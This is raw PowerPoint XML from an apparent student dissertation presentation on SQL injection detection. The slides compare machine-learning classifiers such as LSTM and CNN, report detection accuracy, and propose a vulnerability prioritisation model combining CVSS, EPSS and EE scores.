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9"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId30"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="281" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="269" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="280" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="271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5" r:id="rId26"/>
    <p:sldId id="283" r:id="rId27"/>
    <p:sldId id="284" r:id="rId28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666B8-8963-4923-B4BC-5F472DDBE07D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C3B67A4-55D3-4EA2-94D2-C832F230C2D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Sometimes training the ML classifiers led to the system freezing or crashing. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD7B9A1F-FBF5-4ED8-BFBB-A2D387B9BA62}" type="parTrans" cxnId="{61950D0D-FBEB-4A25-975E-AE62BE71B9B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2266F2D5-FB98-498E-931C-AD3074B3E75D}" type="sibTrans" cxnId="{61950D0D-FBEB-4A25-975E-AE62BE71B9B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3E80154-12B2-4AA3-8A12-B639A304ED0C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Difficulty in extracting CVSS scores due to rate limiting.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95A0A682-D598-4897-BC13-692EF7BAB87B}" type="parTrans" cxnId="{59EAA5F4-42C3-4CD4-881B-356B723C4C03}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5159649A-7B6A-4BD5-80F0-F03AF6A0E9DD}" type="sibTrans" cxnId="{59EAA5F4-42C3-4CD4-881B-356B723C4C03}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63520E8E-D96B-496F-A4DC-275C9C46B91D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Capturing network layer information using mitmproxy. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA0D8D45-6E2F-4F7E-B035-21F4712596E4}" type="parTrans" cxnId="{62A79469-9C1B-49A9-9031-3929DBBD6A0E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40EAE9EA-F9D1-4D3D-8D8A-1AB6F657372E}" type="sibTrans" cxnId="{62A79469-9C1B-49A9-9031-3929DBBD6A0E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{369412AF-8B44-4C3A-9FB2-383B6AACC209}" type="pres">
      <dgm:prSet presAssocID="{B18666B8-8963-4923-B4BC-5F472DDBE07D}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4CB2DC51-037F-4EB3-932D-53017B266793}" type="pres">
      <dgm:prSet presAssocID="{CC3B67A4-55D3-4EA2-94D2-C832F230C2D3}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3ADD50DA-1A7E-49EF-891C-A6B8E5E64CAD}" type="pres">
      <dgm:prSet presAssocID="{CC3B67A4-55D3-4EA2-94D2-C832F230C2D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F5C8CDF6-C94E-4BA5-AC92-BBE3EC460F44}" type="pres">
      <dgm:prSet presAssocID="{CC3B67A4-55D3-4EA2-94D2-C832F230C2D3}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B945407B-C993-48DD-91B3-D3F9E92367BD}" type="pres">
      <dgm:prSet presAssocID="{CC3B67A4-55D3-4EA2-94D2-C832F230C2D3}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E8FBFDDC-541D-43C7-9901-49F3277019B9}" type="pres">
      <dgm:prSet presAssocID="{2266F2D5-FB98-498E-931C-AD3074B3E75D}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92217B18-A782-4CC7-8260-3DBE90225F98}" type="pres">
      <dgm:prSet presAssocID="{B3E80154-12B2-4AA3-8A12-B639A304ED0C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7DEC7DCB-8D94-401F-94A1-2EF3CC00905A}" type="pres">
      <dgm:prSet presAssocID="{B3E80154-12B2-4AA3-8A12-B639A304ED0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0D541186-F71A-476E-901B-8381B4D85691}" type="pres">
      <dgm:prSet presAssocID="{B3E80154-12B2-4AA3-8A12-B639A304ED0C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52243579-6CD7-4DFF-96BE-CC71DF92B125}" type="pres">
      <dgm:prSet presAssocID="{B3E80154-12B2-4AA3-8A12-B639A304ED0C}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1536E80-BB71-4F96-89A1-ADD7B81B6292}" type="pres">
      <dgm:prSet presAssocID="{5159649A-7B6A-4BD5-80F0-F03AF6A0E9DD}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4331AA39-230C-4328-931A-A6C632B32FD5}" type="pres">
      <dgm:prSet presAssocID="{63520E8E-D96B-496F-A4DC-275C9C46B91D}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F24E1C25-757A-4ABE-8C7B-D8184DF4DCAD}" type="pres">
      <dgm:prSet presAssocID="{63520E8E-D96B-496F-A4DC-275C9C46B91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C7738EA-503E-43CF-AE83-87414ACC3CB9}" type="pres">
      <dgm:prSet presAssocID="{63520E8E-D96B-496F-A4DC-275C9C46B91D}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A29A316B-3DA3-4155-91FA-80EB9DABFFC0}" type="pres">
      <dgm:prSet presAssocID="{63520E8E-D96B-496F-A4DC-275C9C46B91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1950D0D-FBEB-4A25-975E-AE62BE71B9B5}" srcId="{B18666B8-8963-4923-B4BC-5F472DDBE07D}" destId="{CC3B67A4-55D3-4EA2-94D2-C832F230C2D3}" srcOrd="0" destOrd="0" parTransId="{DD7B9A1F-FBF5-4ED8-BFBB-A2D387B9BA62}" sibTransId="{2266F2D5-FB98-498E-931C-AD3074B3E75D}"/>
    <dgm:cxn modelId="{2A4EED0D-C497-4407-9020-0C68420A5ADE}" type="presOf" srcId="{CC3B67A4-55D3-4EA2-94D2-C832F230C2D3}" destId="{B945407B-C993-48DD-91B3-D3F9E92367BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{62A79469-9C1B-49A9-9031-3929DBBD6A0E}" srcId="{B18666B8-8963-4923-B4BC-5F472DDBE07D}" destId="{63520E8E-D96B-496F-A4DC-275C9C46B91D}" srcOrd="2" destOrd="0" parTransId="{BA0D8D45-6E2F-4F7E-B035-21F4712596E4}" sibTransId="{40EAE9EA-F9D1-4D3D-8D8A-1AB6F657372E}"/>
    <dgm:cxn modelId="{9AB6F9BB-0CCA-429B-8E7C-690580C9AA97}" type="presOf" srcId="{B3E80154-12B2-4AA3-8A12-B639A304ED0C}" destId="{52243579-6CD7-4DFF-96BE-CC71DF92B125}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{9FC7C6C6-4F45-459D-989C-9E94A8177C94}" type="presOf" srcId="{63520E8E-D96B-496F-A4DC-275C9C46B91D}" destId="{A29A316B-3DA3-4155-91FA-80EB9DABFFC0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{BABE6FCA-3E99-44FE-A5C2-844B3001B6B7}" type="presOf" srcId="{B18666B8-8963-4923-B4BC-5F472DDBE07D}" destId="{369412AF-8B44-4C3A-9FB2-383B6AACC209}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{59EAA5F4-42C3-4CD4-881B-356B723C4C03}" srcId="{B18666B8-8963-4923-B4BC-5F472DDBE07D}" destId="{B3E80154-12B2-4AA3-8A12-B639A304ED0C}" srcOrd="1" destOrd="0" parTransId="{95A0A682-D598-4897-BC13-692EF7BAB87B}" sibTransId="{5159649A-7B6A-4BD5-80F0-F03AF6A0E9DD}"/>
    <dgm:cxn modelId="{31BB701C-DB9A-4B34-8749-57897E88B176}" type="presParOf" srcId="{369412AF-8B44-4C3A-9FB2-383B6AACC209}" destId="{4CB2DC51-037F-4EB3-932D-53017B266793}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{D66ECFDC-D0BE-40F7-AAB1-DB5C7BC0B801}" type="presParOf" srcId="{4CB2DC51-037F-4EB3-932D-53017B266793}" destId="{3ADD50DA-1A7E-49EF-891C-A6B8E5E64CAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{26C6A1A7-2E61-41B1-9C3B-29D08EC358F4}" type="presParOf" srcId="{4CB2DC51-037F-4EB3-932D-53017B266793}" destId="{F5C8CDF6-C94E-4BA5-AC92-BBE3EC460F44}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{9EDDEE9D-B5A0-4E00-9774-910F453595DA}" type="presParOf" srcId="{4CB2DC51-037F-4EB3-932D-53017B266793}" destId="{B945407B-C993-48DD-91B3-D3F9E92367BD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{16E578E9-55DE-43ED-A63E-10DB741C5466}" type="presParOf" srcId="{369412AF-8B44-4C3A-9FB2-383B6AACC209}" destId="{E8FBFDDC-541D-43C7-9901-49F3277019B9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{17436D46-7B0D-4748-9D17-7939FE5A9E12}" type="presParOf" srcId="{369412AF-8B44-4C3A-9FB2-383B6AACC209}" destId="{92217B18-A782-4CC7-8260-3DBE90225F98}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E9C57B1F-3BD0-4814-B20E-713C30A1FBF6}" type="presParOf" srcId="{92217B18-A782-4CC7-8260-3DBE90225F98}" destId="{7DEC7DCB-8D94-401F-94A1-2EF3CC00905A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{F2826296-BBDE-43EB-8B03-413478F1B0CF}" type="presParOf" srcId="{92217B18-A782-4CC7-8260-3DBE90225F98}" destId="{0D541186-F71A-476E-901B-8381B4D85691}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{8DEA8C33-4CB7-4E28-8F87-E9FA4E3D830D}" type="presParOf" srcId="{92217B18-A782-4CC7-8260-3DBE90225F98}" destId="{52243579-6CD7-4DFF-96BE-CC71DF92B125}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{03B52C89-C4F2-47C2-8D38-99C0318E2DC8}" type="presParOf" srcId="{369412AF-8B44-4C3A-9FB2-383B6AACC209}" destId="{A1536E80-BB71-4F96-89A1-ADD7B81B6292}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{B80231A2-A6B2-4071-A9BC-138E2B3AF5D8}" type="presParOf" srcId="{369412AF-8B44-4C3A-9FB2-383B6AACC209}" destId="{4331AA39-230C-4328-931A-A6C632B32FD5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{A457BF67-B4C4-4B8D-9D4A-244259543E44}" type="presParOf" srcId="{4331AA39-230C-4328-931A-A6C632B32FD5}" destId="{F24E1C25-757A-4ABE-8C7B-D8184DF4DCAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E83D5D67-61A3-4EC1-8735-F08574EC5E1B}" type="presParOf" srcId="{4331AA39-230C-4328-931A-A6C632B32FD5}" destId="{0C7738EA-503E-43CF-AE83-87414ACC3CB9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{F76AC084-2A4D-41DB-A049-9C0B132AE78A}" type="presParOf" srcId="{4331AA39-230C-4328-931A-A6C632B32FD5}" destId="{A29A316B-3DA3-4155-91FA-80EB9DABFFC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D50DA-1A7E-49EF-891C-A6B8E5E64CAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="975829" y="535463"/>
          <a:ext cx="1458957" cy="14589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5407B-C993-48DD-91B3-D3F9E92367BD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="84244" y="2379022"/>
          <a:ext cx="324212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Sometimes training the ML classifiers led to the system freezing or crashing. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="84244" y="2379022"/>
        <a:ext cx="3242127" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7DEC7DCB-8D94-401F-94A1-2EF3CC00905A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4785328" y="535463"/>
          <a:ext cx="1458957" cy="14589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43579-6CD7-4DFF-96BE-CC71DF92B125}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3893743" y="2379022"/>
          <a:ext cx="324212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Difficulty in extracting CVSS scores due to rate limiting.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3893743" y="2379022"/>
        <a:ext cx="3242127" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F24E1C25-757A-4ABE-8C7B-D8184DF4DCAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8594828" y="535463"/>
          <a:ext cx="1458957" cy="14589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A316B-3DA3-4155-91FA-80EB9DABFFC0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7703243" y="2379022"/>
          <a:ext cx="324212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Capturing network layer information using mitmproxy. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7703243" y="2379022"/>
        <a:ext cx="324212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71E10E-35B8-47D3-9928-6154DA9F5F92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4EEB86-F496-4E4F-8177-5ED3E84B3BB3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/19/2023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  <a:endParaRPr lang="en-US"/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4EEB86-F496-4E4F-8177-5ED3E84B3BB3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4EEB86-F496-4E4F-8177-5ED3E84B3BB3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39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35F4B9-F1B0-40F5-8173-5B51380DB1EB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01B09-E5B3-4255-99D1-E8D6E12FFBCA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771E5F-836D-42BC-953F-FC50A1320578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59BC2B-8608-4C92-BFC1-109EE59EA623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18D62E-6229-450B-ABA0-A46BB7A2220C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A05BE0-1BBE-4892-81AC-B2168C786F75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8B1981-3C58-4D11-A147-F8A0681CD1E5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2ED271-FE3F-4F86-A29A-C649AC4E9E09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96831C-B66C-4213-A8C7-0B8BF9EE4B8C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B37C7D90-4A77-446C-81CE-D117E7114A23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552D4A-6811-400E-B3D6-0E46414D9E26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D7C6DD-97B6-4D8D-952A-561C76A601BB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460120.3484577" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doi.org/10.3745/jips.03.0024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7763/ijiee.2011.v1.6" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doi.org/10.14569/ijacsa.2022.013099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09/access.2018.288420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OO02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-gb" dirty="0"/>
              <a:t>: SQL Injection attack detection and prevention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744712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ELE8095, A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-gb" dirty="0"/>
              <a:t>lan Paul (40228223)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9C098-3687-5EEC-8B73-E9EA4222B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5144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Classifier Selection and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B5ACC-4545-0821-DBC9-C14409B58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-114301"/>
            <a:ext cx="11029615" cy="6903339"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Support Vector Machines (SVM), Random Forests (RF), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>XGBoost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, Naïve Bayes (NB), Convolutional Neural Network (CNN) and long short-term memory (LSTM).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SVM, RF and NB to have strong performance in both binary and multi-classification tasks [9]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>LSTM in combination with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>GloVe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> embeddings improved performance consistently across metrics, even with an unbalanced dataset [10].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Combining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>GloVe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> word embeddings with both LSTM and CNN significantly reduces computation time, while maintaining high accuracy levels [10].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Both CNN and LSTM individually achieve respectable accuracy, highlighting their robustness and flexibility [10]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2982055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200E7-2EF8-2204-CE87-91B2137C9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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Experimental Results and Analysis – HTTP/Application Layer Detection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A3C2DB-6E98-E60D-27FF-814DAEC95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74409" y="933450"/>
            <a:ext cx="5435767" cy="5363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EA3B42-18DE-259D-60C6-3CADEC56B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GB" dirty="0"/>
              <a:t>For the HTTP SQLi Attack Detection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>he LSTM model was able to detect all classes with near perfect values for the individual evaluation metrics. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The LSTM model outperforms the hybrid CNN+LSTM model due to its capability to handle imbalanced datasets effectively.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20FE75-C7EE-DB49-1A80-3B0387CB77C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784755" y="6292183"/>
            <a:ext cx="346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Table 10 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350522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200E7-2EF8-2204-CE87-91B2137C9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/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>Experimental Results and Analysis – Network traffic Detection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66F0E5-F796-43FF-0D2A-C14B191FF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8930" y="1179828"/>
            <a:ext cx="5057957" cy="49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EA3B42-18DE-259D-60C6-3CADEC56B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/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>For the Network Traffic SQLi Attack Detection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The CNN and LSTM hybrid model outperformed the other models with an overall accuracy, precision, recall and f1 scores of 97.63%, 96.00%, 99.40%, 97.67% respectively. Moreover, this model had a relatively low FPR of 0.0414.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8C4EC6-F670-AE85-55BF-6B2031D033AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6689062" y="6170597"/>
            <a:ext cx="346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Table 11 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32765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5B6B-0B44-CCC4-8400-29EED8C9C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146474"/>
            <a:ext cx="11029616" cy="565051"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Risk Analysis and Threat modelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014298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EEA5F5-5866-AF10-82CE-85D1ECC37474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650766" y="516627"/>
            <a:ext cx="11029616" cy="9146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RISK R34P3R: Attack Prioritization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094736-032E-554A-174A-887CBF9ECFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511620" y="1512408"/>
            <a:ext cx="11029615" cy="465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Combination of risk analysis and threat modelling revealed connections between detected attacks and known threat actors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0"/>
              <a:t>Evaluated state-of-the-art Vulnerability Prioritizat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ion Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common Vulnerability Scoring System (CVSSv3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Exploit Prediction Scoring System (EPSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Expected Exploitability (EE)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OWASP Risk Rating Methodology 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 Context-Aware Vulnerability Prioritization (CAVP) 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Vulnerability Priority Rating (VPR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This research proposes, RISK R34P3R, an attack prioritization model that combines CVSS, EPSS and EE that considers exploitation likelihood, ease of exploitation and severity metrics. </a:t>
            </a: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9814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C72D-F25E-A1A9-21A3-2C17F5F51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723014"/>
            <a:ext cx="3031852" cy="997190"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Individual vs Combined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E2814DE9-4DF0-4B06-1303-C50EC16C3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1796902"/>
